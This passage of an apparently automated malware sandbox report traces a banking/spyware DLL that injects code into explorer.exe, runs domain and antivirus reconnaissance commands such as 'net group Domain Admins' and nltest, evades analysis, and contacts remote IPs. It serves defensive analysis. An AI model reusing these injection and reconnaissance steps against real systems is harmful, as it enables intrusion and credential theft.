            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B45648_2_0E4B4564
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C55348_2_0E4C5534
            Source: C:\Windows\explorer.exeCode function: 8_2_0E45453C8_2_0E45453C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E49B5D08_2_0E49B5D0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B05FC8_2_0E4B05FC
            Source: C:\Windows\explorer.exeCode function: 8_2_0E47F5FB8_2_0E47F5FB
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4805A08_2_0E4805A0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4563588_2_0E456358
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4DB3708_2_0E4DB370
            Source: C:\Windows\explorer.exeCode function: 8_2_0E45E31C8_2_0E45E31C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4983EC8_2_0E4983EC
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C73A08_2_0E4C73A0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4BA0488_2_0E4BA048
            Source: C:\Windows\explorer.exeCode function: 8_2_0E48E0748_2_0E48E074
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4560788_2_0E456078
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4AF0188_2_0E4AF018
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4760388_2_0E476038
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4970C08_2_0E4970C0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C01548_2_0E4C0154
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B01148_2_0E4B0114
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C41348_2_0E4C4134
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B11CC8_2_0E4B11CC
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4851C08_2_0E4851C0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4801FB8_2_0E4801FB
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4A318C8_2_0E4A318C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E46D19C8_2_0E46D19C
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FF8A8DC9868 appears 296 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FF8A8D0F210 appears 62 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FF8A8DC9670 appears 61 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FF8A8D0C6C0 appears 198 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FF8A8D0ECA0 appears 394 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FF8A8CFE038 appears 69 times
            Source: C:\Windows\explorer.exeCode function: String function: 0E477D54 appears 31 times
            Source: C:\Windows\explorer.exeCode function: String function: 0E45E160 appears 147 times
            Source: C:\Windows\explorer.exeCode function: String function: 0E45D5A8 appears 35 times
            Source: C:\Windows\explorer.exeCode function: String function: 0E45D6E8 appears 52 times
            Source: wait.dll.dll Binary or memory string: OriginalFilenamenvsvc32.exez- vs wait.dll.dll
            Source: classification engine Classification label: mal100.spre.bank.troj.spyw.evad.winDLL@70/7@7/4
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D7CB80 LoadLibraryW,GetLastError,swprintf,FormatMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,LocalFree,FreeLibrary,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
            Source: C:\Windows\System32\rundll32.exe Code function: 3_3_00007DF4A9FC0000 CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D2C180 CoCreateInstance,StringFromGUID2,RegQueryInfoKeyW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegCloseKey
            Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8CFEA34 LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary
            Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\stkm[1].bin
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
            Source: C:\Windows\System32\rundll32.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3948:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03
            Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Iyufla1.tmp
            Source: wait.dll.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Iyufla1.tmp.8.dr, Alakow3.tmp.8.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\wait.dll.dll"
            Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
            Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
            Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",Jump
            Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\systeminfo.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
            Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
            Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c net view /all
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
            Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
            Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
            Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\whoami.exe whoami /groups
            Source: C:\Windows\System32\loaddll64.exe Section loaded: apphelp.dll
            Source: C:\Windows\System32\loaddll64.exe Section loaded: wtsapi32.dll
            Source: C:\Windows\System32\loaddll64.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\loaddll64.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\loaddll64.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\loaddll64.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exe Section loaded: dsrole.dll
            Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
            Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll
            Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
            Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
            Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
            Source: C:\Windows\explorer.exe Section loaded: webio.dll
            Source: C:\Windows\explorer.exe Section loaded: mozglue.dll
            Source: C:\Windows\explorer.exe Section loaded: wsock32.dll
            Source: C:\Windows\explorer.exe Section loaded: vaultcli.dll
            Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office
            Source: wait.dll.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: wait.dll.dllStatic PE information: Image base 0x180000000 > 0x60000000
            Source: wait.dll.dllStatic file information: File size 2151936 > 1048576
            Source: wait.dll.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x12fe00
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: wait.dll.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF
            Source: Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4538924938.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.4538185673.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, wait.dll.dll
            Source: wait.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: wait.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: wait.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: wait.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: wait.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4589E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,8_2_0E4589E4
            Source: wait.dll.dllStatic PE information: real checksum: 0x1d7e57 should be: 0x216e55
            Source: wait.dll.dllStatic PE information: section name: .didat
            Source: C:\Windows\System32\rundll32.exeCode function: 3_3_000001CEAFDF0105 push ecx; retf 3_3_000001CEAFDF010E
            Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000027619780105 push ecx; retf 4_3_000002761978010E
            Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000002339FC40105 push ecx; retf 6_3_000002339FC4010E

            Persistence and Installation Behavior

            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all

            Boot Survival

            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami /groups
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\whoami.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4576DC rdtsc 8_2_0E4576DC
            Source: C:\Windows\explorer.exeCode function: 8_2_0E454948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,8_2_0E454948
            Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,3_2_000001CEAFC94D00
            Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,4_2_0000027619644D00
            Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,6_2_000002339FBA4D00
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_03038424
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,8_2_03037274
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,8_2_08387274
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_08388424
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,8_2_08857274
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_08858424
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CFDCBC WTSGetActiveConsoleSessionId,WTSEnumerateSessionsW,WTSFreeMemory,WTSQueryUserToken,GetLastError,SetupDiGetClassDevsW,GetLastError,SetupDiGetDeviceInstanceIdW,GetLastError,StrStrIW,SetupDiGetDeviceRegistryPropertyW,lstrcmpiW,CM_Get_DevNode_Status,SetupDiOpenDevRegKey,RegCloseKey,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,CloseHandle,3_2_00007FF8A8CFDCBC
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2241
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 526
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 6837
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876
            Source: C:\Windows\System32\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-54165
            Source: C:\Windows\System32\rundll32.exeAPI coverage: 3.7 %
            Source: C:\Windows\System32\loaddll64.exe TID: 5856Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6448Thread sleep count: 2241 > 30
            Source: C:\Windows\explorer.exe TID: 6448Thread sleep time: -2241000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1276Thread sleep count: 526 > 30
            Source: C:\Windows\explorer.exe TID: 1276Thread sleep time: -52600s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6448Thread sleep count: 6837 > 30
            Source: C:\Windows\explorer.exe TID: 6448Thread sleep time: -6837000s >= -30000s
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D72E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,3_2_00007FF8A8D72E90
            Source: C:\Windows\explorer.exeCode function: 8_2_0303A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0303A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_03032B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_03032B28
            Source: C:\Windows\explorer.exeCode function: 8_2_030404C0 FindFirstFileW,8_2_030404C0
            Source: C:\Windows\explorer.exeCode function: 8_2_0838A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0838A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_083904C0 FindFirstFileW,8_2_083904C0
            Source: C:\Windows\explorer.exeCode function: 8_2_08382B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_08382B28
            Source: C:\Windows\explorer.exeCode function: 8_2_0885A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0885A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_088604C0 FindFirstFileW,8_2_088604C0
            Source: C:\Windows\explorer.exeCode function: 8_2_08852B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_08852B28
            Source: C:\Windows\explorer.exeCode function: 8_2_0E456604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,8_2_0E456604
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4516F4 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0E4516F4
            Source: C:\Windows\explorer.exeCode function: 8_2_0E515C40 FindFirstFileW,FindClose,8_2_0E515C40
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4F50D8 FindFirstFileA,8_2_0E4F50D8
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4F5088 CloseHandle,GetCurrentProcessId,FindFirstFileA,FindClose,GetFileSize,8_2_0E4F5088
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CF9A80 GetSystemInfo,3_2_00007FF8A8CF9A80
            Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000
            Source: C:\Windows\explorer.exeProcess information queried: ProcessInformation
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4576DC rdtsc 8_2_0E4576DC
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC7CCE0 LdrGetProcedureAddress,3_2_000001CEAFC7CCE0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DB8990 GetLastError,IsDebuggerPresent,OutputDebugStringW,3_2_00007FF8A8DB8990
            Source: C:\Windows\explorer.exeCode function: 8_2_0E454948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,8_2_0E454948
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4589E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,8_2_0E4589E4
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D68920 swprintf,OpenMutexW,swprintf,GetProcessHeap,HeapFree,3_2_00007FF8A8D68920
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DCCFD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF8A8DCCFD8
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D96264 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF8A8D96264
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4E1DA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0E4E1DA0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4F53A8 SetUnhandledExceptionFilter,8_2_0E4F53A8

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\explorer.exeNetwork Connect: 104.21.68.89 443
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.217.190 443
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 103.57.249.207 6542
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.43.224 6542
            Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 3030000 protect: page execute and read and write
            Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 8380000 protect: page execute and read and write
            Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 8850000 protect: page execute and read and write
            Source: C:\Windows\System32\rundll32.exeCode function: 3_3_00007DF4A9FC0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,3_3_00007DF4A9FC0100
            Source: C:\Windows\System32\rundll32.exeCode function: 4_3_00007DF4051C0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,4_3_00007DF4051C0100
            Source: C:\Windows\System32\rundll32.exeCode function: 6_3_00007DF445320100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,6_3_00007DF445320100
            Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 3030000
            Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 8380000
            Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 8850000
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 3030000 value starts with: 4D5A
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 8380000 value starts with: 4D5A
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 8850000 value starts with: 4D5A
            Source: C:\Windows\System32\rundll32.exeMemory written: PID: 1028 base: 3030000 value: 4D
            Source: C:\Windows\System32\rundll32.exeMemory written: PID: 1028 base: 8380000 value: 4D
            Source: C:\Windows\System32\rundll32.exeMemory written: PID: 1028 base: 8850000 value: 4D
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 412
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 4084
            Source: C:\Windows\System32\rundll32.exeThread register set: 412 1
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 3030000
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 8380000
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 8850000
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
